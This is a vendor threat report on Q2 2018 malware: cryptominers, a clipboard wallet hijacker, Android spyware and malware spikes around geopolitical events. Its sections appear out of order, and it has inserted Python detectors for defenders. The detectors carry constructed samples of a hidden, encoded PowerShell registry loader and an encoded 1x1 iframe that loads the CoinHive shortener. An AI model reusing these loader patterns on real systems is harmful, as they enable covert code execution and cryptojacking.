National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online. Students collect data for academic papers; spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual, or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart, showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility."
7.10 Finland, Russia, USA
Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
8 Conclusions
In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence, and much harder for antivirus software to detect. Propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information, or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies, and postures.
Comodo Threat Research Labs monitors, filters, and analyzes malware, ransomware, viruses, and other "unknown," potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia, and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists, and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam, or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government, and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.
About Comodo Cybersecurity
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates, and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network, and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine, and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows components: PowerShell to execute commands, Task Scheduler to ensure persistence, and the Registry to hold the malicious binary code. In the screenshots below you can see exactly how the malware, dubbed BadShell, works.
If we decode the PowerShell arguments, we see the malicious code in the registry. The code is injected into an existing running process by the PowerShell script.
BadShell at work
The malicious code in the registry
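The chain shown in these screenshots (a scheduled task launching PowerShell with an encoded argument that pulls its payload out of the registry and runs it in memory) is something a defender can triage from the task's action or from a process-creation log. The Python below is an added example, not Comodo's code: it decodes a -EncodedCommand argument and scores the indicators of that chain; the registry path, script and task command lines are constructed samples.

```python
"""Triage of PowerShell launch commands for the BadShell pattern.

Added example, not code from the report. Input is the command line that a
scheduled task action (or a Sysmon/4688 process-creation event) launches.
It decodes a -EncodedCommand payload and flags the fileless chain described
above: code read from the registry, decoded in memory, then executed or
injected into a running process. The registry path, script and command
lines below are constructed samples.
"""
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand, so match
# "-e", "-enc", "-EncodedCommand" followed by a base64-looking token.
ENCODED_ARG = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)

# One indicator per link of the chain; each is a regex over the full text
# (outer command line plus the decoded script).
INDICATORS = {
    "registry_read": re.compile(
        r"Get-ItemProperty(?:Value)?|HK(?:LM|CU|EY_[A-Z_]+)[:\\]", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "dynamic_exec": re.compile(
        r"Invoke-Expression|\biex\b|Invoke-Command|\[ScriptBlock\]::Create", re.I),
    "process_injection": re.compile(
        r"VirtualAllocEx|WriteProcessMemory|CreateRemoteThread|OpenProcess", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
}


def decode_encoded_command(command_line):
    """Return the script carried by -EncodedCommand (UTF-16LE base64), or None."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def encode_for_powershell(script):
    """Produce the -EncodedCommand form (UTF-16LE, base64); used here only to
    build test input for the detector."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def triage(command_line):
    """Score one command line: decoded script, indicator hits and a verdict.

    The verdict escalates only when something is fetched or decoded at run
    time AND then executed or injected, which is the BadShell chain; an
    encoded but self-contained script is decoded and reported, not flagged."""
    decoded = decode_encoded_command(command_line)
    text = command_line + ("\n" + decoded if decoded else "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    fetched = "registry_read" in hits or "base64_decode" in hits
    executed = "dynamic_exec" in hits or "process_injection" in hits
    return {"decoded": decoded, "hits": hits, "suspicious": fetched and executed}


# Constructed sample modelled on the report's description: a hidden
# PowerShell that reads a blob from a made-up registry value, decodes it
# and hands it to Invoke-Expression.
SAMPLE_SCRIPT = (
    "$b=(Get-ItemProperty -Path 'HKLM:\\SOFTWARE\\ExampleVendor\\Cfg' -Name Data).Data;"
    "$s=[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($b));"
    "Invoke-Expression $s"
)
SAMPLE_TASK_ACTION = (
    "powershell.exe -NoP -W Hidden -NonI -Enc " + encode_for_powershell(SAMPLE_SCRIPT)
)
# Constructed benign task: an ordinary script file, nothing decoded at run time.
BENIGN_TASK_ACTION = (
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\nightly-backup.ps1"
)

if __name__ == "__main__":
    for action in (SAMPLE_TASK_ACTION, BENIGN_TASK_ACTION):
        result = triage(action)
        verdict = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(action[:60], "->", verdict, result["hits"])
```

The same triage applies to Sysmon event 1 or Security event 4688 command lines, which is where the PowerShell arguments the report decodes would appear.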
This emergency clearly demonstrates how dangerous cryptominer activity can be. Just imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to perform their jobs. Comodo analysts took over the situation and cleaned the infection from all involved computers, but of course the company's financial losses were irreversible.
Invulnerability to antivirus and persistence in the system are the most important attributes for a cryptominer, because the longer it runs within the infected system, the more it profits the attackers. That is why cybercriminals pay special attention to a cryptominer's ability to elude antivirus software.
Below is another cunning technique that turns an infected machine into a slave of the attacker.
3.2 WinstarNssmMiner, a system killer
Like other cryptominers, WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals. But it has a special feature: it can root into a system so deeply that it becomes unremovable. Attempting to kill it will kill the target system totally.
The secret of WinstarNssmMiner's persistence lies in its method of infecting a victim's computer. It consists of two processes injected into two system svchost.exe processes. The first performs the main task, mining cryptocurrency. The other runs in the background, looking for antivirus products and disabling them.
The malicious code disguised as svchost.exe
Especially impressive is that both infected svchost.exe processes possess the system attribute "CriticalProcess," meaning that terminating either of them will crash the system, leaving the user with a blue screen.
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victims' systems but also their cryptomining competitors.
3.3 CoinMiner kills rivals
CoinMiner stands out against other cryptominers with a kill-list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature terminates its processes.
CoinMiner kills its rivals as follows.
The code below downloads CoinMiner for the Windows architecture (x86 or x64) and then checks whether a miner is already running by testing for the presence of an "AMDDriver64" process.
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists, named $malwares and $malwares2, with the names of the processes that it is instructed to kill. The lists include other types of cryptominers.
In this way, CoinMiner occupies the victim's computer undivided, using its resources for mining cryptocurrency.
Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, easing user detection. In Q2 these cryptominers learned to hide; CoinHive is the brightest example of them.
3.4 CoinHive changes its skin
CoinHive is a popular JavaScript cryptominer. If you put its string of code into your website page, every visitor to the site will mine coins for you.
As you can see, the CoinHive script is easily detected.
The CoinHive script
After many publications on this subject in the mass media and cybersecurity reports, users have started checking websites' code for cryptominers. But in the second quarter, perpetrators found a way to overcome this obstacle. Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners.
As a result, the malicious code on a webpage looks like this:
The obfuscated malicious code on a webpage
If we decode the string, we encounter an iframe.
The iframe loads the URL shortener
The iframe loads the URL shortener. Notice that the width and height of the iframe are set to 1 to make the iframe as invisible as possible.
Now let's look at the URL https://cnhv.co
And there we find the familiar link to CoinHive.
The link to CoinHive
What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but doesn't find any signs of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
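A view-source check fails here because the iframe only exists after the page's own JavaScript decodes it. The Python below is an added example, not Comodo's code: it scans a page for both forms described in this section, the overt CoinHive script include and the encoded document.write() that drops a 1x1 iframe pointing at the cnhv.co shortener, by decoding the inline literals before parsing them. The sample pages and the short-link path are constructed.

```python
"""Spotting a CoinHive loader hidden behind an encoded 1x1 iframe.

Added example, not code from the report. scan_page() looks at the raw markup
and at whatever the page's inline unescape()/atob() literals decode to, so
an iframe that only appears after document.write() is still found. Sample
pages and the short-link path are constructed; the hosts come from the
report (coinhive.com for the library, cnhv.co for its URL shortener).
"""
import base64
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

MINER_HOSTS = {"coinhive.com", "cnhv.co"}

# String decoders commonly wrapped around hidden markup. Only single-quoted
# literal arguments are handled; anything computed at run time is out of scope.
UNESCAPE_CALL = re.compile(r"unescape\(\s*'([^']*)'\s*\)")
ATOB_CALL = re.compile(r"atob\(\s*'([^']*)'\s*\)")


def decode_inline_payloads(html):
    """Yield (method, text) for each literal that unescape()/atob() would decode."""
    for m in UNESCAPE_CALL.finditer(html):
        yield "unescape", unquote(m.group(1))
    for m in ATOB_CALL.finditer(html):
        try:
            yield "atob", base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:
            continue


class _TagCollector(HTMLParser):
    """Collects iframe and script start tags; script bodies are CDATA to the
    parser, which is exactly why the decoded pass is needed."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))
        elif tag == "script":
            self.scripts.append(dict(attrs))


def _is_hidden(attrs):
    """True when an iframe is sized 1x1 (or smaller) or styled away."""
    def tiny(value):
        m = re.match(r"\s*(\d+)", value or "")
        return m is not None and int(m.group(1)) <= 1
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return ((tiny(attrs.get("width")) and tiny(attrs.get("height")))
            or "display:none" in style or "visibility:hidden" in style)


def _host(url):
    return (urlsplit(url or "").hostname or "").lower()


def scan_page(html):
    """Return findings for miner script includes and hidden or miner-host iframes."""
    findings = []
    sources = [(None, html)] + list(decode_inline_payloads(html))
    for method, text in sources:
        collector = _TagCollector()
        collector.feed(text)
        for s in collector.scripts:
            src = s.get("src") or ""
            if _host(src) in MINER_HOSTS or "coinhive" in src.lower():
                findings.append({"kind": "miner_script", "src": src, "decoded_from": method})
        for f in collector.iframes:
            src = f.get("src") or ""
            hidden = _is_hidden(f)
            if hidden or _host(src) in MINER_HOSTS:
                findings.append({"kind": "hidden_iframe" if hidden else "miner_iframe",
                                 "src": src, "decoded_from": method})
    return findings


# Constructed page: a visible, harmless embed plus the covert loader. The
# percent-encoded literal decodes to a 1x1 iframe loading the shortener.
SAMPLE_PAGE = """<html><head><title>Constructed sample</title></head><body>
<p>Welcome</p>
<script>document.write(unescape('%3Ciframe src%3D%22https://cnhv.co/EXAMPLE_SHORTLINK%22 width%3D%221%22 height%3D%221%22%3E%3C/iframe%3E'));</script>
<iframe src="https://example.org/widget" width="560" height="315"></iframe>
</body></html>"""

# Constructed page with the overt form: the library included directly.
OVERT_PAGE = '<script src="https://coinhive.com/lib/coinhive.min.js"></script>'

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_PAGE) + scan_page(OVERT_PAGE):
        print(finding)
```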
The next malware in line prefers not to mine cryptocurrency but to steal it on the fly.
3.5 Cryptocurrency clipboard hijacker intercepts transfers
It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead actually steals cryptocurrency, redirecting it to the perpetrator.
Cryptocurrency transfers require a wallet address. The address is a long string made up of different characters and numbers, so it is almost impossible to remember or fill in manually. That is why users usually copy-paste a wallet address to make a transaction. Cybercriminals regard this copy-paste process as a breach they can use to their advantage.
The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it changes it to the address of a wallet under the attacker's control. So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.
New Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses
This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added the malicious code. The malicious version of All-Radio 4.27 was used for spreading different types of malware, clipboard cryptocurrency hijackers among them.
Here is an example of a clipboard hijacker attack:
A user copied wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
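The substitution above is invisible to the user because the swapped-in address looks just as plausible as the one she copied. The Python below is an added example, not Comodo's code: it replays a constructed trace of clipboard events and alerts when the clipboard changed from one wallet address to a different one without a copy action by the user, which is the behaviour this section describes. The two addresses are the ones quoted above; the event trace is constructed, and base58check_valid() is included to show that a format check alone cannot tell the attacker's address from the user's.

```python
"""Catching a clipboard wallet-address swap before the transfer is sent.

Added example, not code from the report. detect_swaps() compares what the
user last copied with what the clipboard later contains; a change from one
wallet address to another with no user copy in between is the hijacker's
signature. The addresses are the two quoted in the report; the event trace
is constructed.
"""
import hashlib
import re

# Legacy Bitcoin address shape: version prefix 1 or 3, then a Base58 body
# (the alphabet has no 0, O, I or l).
BTC_ADDRESS = re.compile(r"^[13][1-9A-HJ-NP-Za-km-z]{25,34}$")
BASE58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def base58check_valid(address):
    """True when the address decodes to 25 bytes whose double-SHA256 checksum
    verifies. A well-formed address passes regardless of who owns it, so this
    is a sanity filter, not a defence against substitution."""
    if not BTC_ADDRESS.match(address):
        return False
    n = 0
    for ch in address:
        n = n * 58 + BASE58.index(ch)
    try:
        raw = n.to_bytes(25, "big")
    except OverflowError:
        return False
    payload, checksum = raw[:21], raw[21:]
    digest = hashlib.sha256(hashlib.sha256(payload).digest()).digest()
    return digest[:4] == checksum


def looks_like_wallet(text):
    return bool(BTC_ADDRESS.match(text.strip()))


def detect_swaps(events):
    """events: iterable of (kind, text). 'copy' is a copy performed by the user;
    'clipboard' is a later observation of the clipboard contents. An alert is
    raised when an observed address differs from the address the user last
    copied, i.e. the contents changed without a user action."""
    alerts = []
    last_user_copy = None
    for kind, text in events:
        if kind == "copy":
            last_user_copy = text
        elif kind == "clipboard" and last_user_copy is not None:
            if (text != last_user_copy and looks_like_wallet(last_user_copy)
                    and looks_like_wallet(text)):
                alerts.append({"expected": last_user_copy, "found": text})
    return alerts


# The two addresses quoted in the report, placed in a constructed event trace.
COPIED = "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"
SWAPPED = "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"
SAMPLE_EVENTS = [
    ("copy", "meeting at 10"),
    ("clipboard", "meeting at 10"),
    ("copy", COPIED),
    ("clipboard", COPIED),    # right after the copy the clipboard is intact
    ("clipboard", SWAPPED),   # the hijacker has replaced it in the background
]

if __name__ == "__main__":
    for alert in detect_swaps(SAMPLE_EVENTS):
        print("clipboard swap: expected", alert["expected"], "found", alert["found"])
```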
Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a new, serious challenge for cybersecurity departments and vendors.
4 Android Devices Under Siege
4.1 Spying, Stealing, Mining
Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. It is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.
If the victim is a CEO, politician, or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.
Today, spying is the number one purpose of Android malware. In Q2, Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.
The digital spooks
Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.
4.1.1 KevDroid
The first is named KevDroid. It's distributed in three versions:
Version 1: Naver Defender
Version 2: Netease Defender
Version 3: PU
Disguises of KevDroid
The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional abilities for spying. It steals account details: contacts, id, name, phone numbers, and email address of the owner. It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type), and photos of the contacts. After extracting all the data, the malware encrypts it with the AES algorithm and sends it to the attackers' server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps, and the launcher name.
The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity. Then it sends the video to the attackers' server.
Version 3 of KevDroid takes photos, records calls, and creates a list of files on the device. It also extracts the web history, account and contact details, and the device information.
People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment, the spyware constantly kept track of all events on the infected device. Another means of the malware's dissemination was social networks.
Version 1: Dardesh, Google Play Services, Instant Apps
Version 2: Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls, audio, and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts the metadata, and makes changes on the victim device.
4.1.2 Zoo Park
The next member of the spy family, Zoo Park, has 4 different versions:
Version 1: Telegram Groups, انتخاب دھم
Version 2: Postrall, Yes For Referendum, انتخاب دھم
Version 3: Celebs Gone Wild, جریدة النھار الكویتیة, 剑侠挂机
Version 4: VPN Easy, DroFirewall, m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app. It extracts account and contact details, encodes them with Base64, and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, network operator name, SDK version, OS version, etc.), call log details, and external storage content.
The third version is included in spyware named "Spymaster Pro" and can:
- Enable and disable the GPS services
- Record audio and send it to the Command & Control server
- Upload image files
- Collect information about the applications installed
- Collect browser data
- Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.
In addition to the abilities of previous versions, it includes some additional tricks:
- Extracts photos, audio, and videos
- Records the screen
- Executes shell commands
- Records calls
4.1.3 MikeSpy
Some spyware samples specifically hunt for messengers' data, like the next digital spook, MikeSpy.
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflages itself as a Virtual Girlfriend application. But instead of a girlfriend, it has a bundle of malicious abilities:
- Takes control of the Bluetooth adapter
- Extracts data about accounts, contact details, and installed apps
- Extracts data from the WhatsApp message DB and related keys
- Uploads collected data to the cybercriminals' server via FTP
4.1.4 Xloader
The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.
Version 1 to Version 3: FaceBook, Chrome
Disguises of Xloader
After infection, Xloader connects to its C&C server and executes the following commands:
- Extract the device information
- Delete SMS
- Set ringer mode
- Monitor incoming SMS messages
- Clear memory
- Check for the presence of the following banking applications: comwooribankpibsmart, comkbstarkbbank, comibkneobanking, comscdanbscbankapp, comshinhansbanking, comhanabankebkchannelandroidhananbank, nhsmart, comepostpsfsdsi, comkftckjbsmb, comsmgspbs
- Extract contact details
- Set Wi-Fi to always on
Version 2 can execute additional commands:
- Send SMS and read outgoing SMS
- Enable and disable a Wi-Fi connection
- Access a location specified by the attackers
- Make recordings
- Make calls
4.1.5 Stalker Spy
The next malware in line is Stalker Spy. As you can see, it's a champion in the number of masks it puts on to deceive users.
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to the usual must-have spyware set, Xloader can remotely turn on the microphone of the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy, MobiSpy.
4.1.6 Mystery Bot
The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it a spy with a 007 license.
Version 1: Adobe Flash Player
Version 2: Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player. Below is a list of some of the commands that the malware can execute on your device:
- Send_SMS: extract SMS content and send it to the C&C server
- Send_USSD: send the USSD to the C&C server
- Gethistory: monitor browser history
- Start_AllApp: gather info about installed applications
- Send_call: set the Intent action to call
- Forward_call: forward incoming calls
- ResForward_call: reset call forwarding
- Go_Smsmnd: delete SMS content
- Go_GetAlls: get SMS history
- Dell_sms: delete SMS content in a conversation
- Send_spam: send spam SMS
- Start_Inject: call the injectors class
4.1.7 FakeSpy
FakeSpy also has many masks, which you can see in the screenshot.
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends it to the C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.
Here are some commands from its Command and Control server:
- contacts: get contact details and email id
- Mute: set action to mute
- Mms: get MMS content
- info: get device information
4.1.8 RedAlert
RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.
Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber
Version 2: Update Google Market, Flash Player, Tactic, FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:
- depostbankfinanzassistent
- plmbank
- aibibankandroid
The second version can block access to some websites, including Google Chrome, Google Play store, Gmail, and YouTube.
4.1.9 Hero Rat
The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party play stores, social networks, and messengers for spreading.
Version 1
CloudVPN MyIrancel Mtproto زیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on a Telegram hacking channel. Noticeably, it's sold in three options: bronze, silver, and gold.
After infiltration into a victim's device, Hero Rat shows a warning like "app can't be run." But it runs in the background and starts its spying activity. It steals text messages and audio recordings, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.
Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get free Followers, and Telegram versions for the Iranian market.
4.1.10 Sonvpay
The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip option." If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.
It comes to victims in the variety of disguises listed above.
4.1.11 CoinHive
And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of which upgrades its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.
Version 1: Netflix Hack, Instagram Hack
Version 2: TSF Launcher
Version 3: Android Service, PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via... another cryptominer, named CoinMiner.
How is it possible? Let's imagine a cybercriminal who wants to infect her victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it, and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim. Thief robbing thief.
This story clearly illustrates the situation in cybersecurity in Q2. No one can feel totally secure. Even a predator can turn prey in seconds.
4.2 Android Malware Catalogued by Month
Below you will find detailed statistics on Android-targeted malware by month.
4.2.1 April 2018
Android-targeted malware in April (chart)
4.2.2 May 2018
Android-targeted malware in May (chart)
4.2.3 June 2018
Android-targeted malware in June (chart)
5 Malware in Q2 2018: The Big Picture
Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms
A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources, and possibly cause a denial of service. For this Q2 2018 report, we place worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms
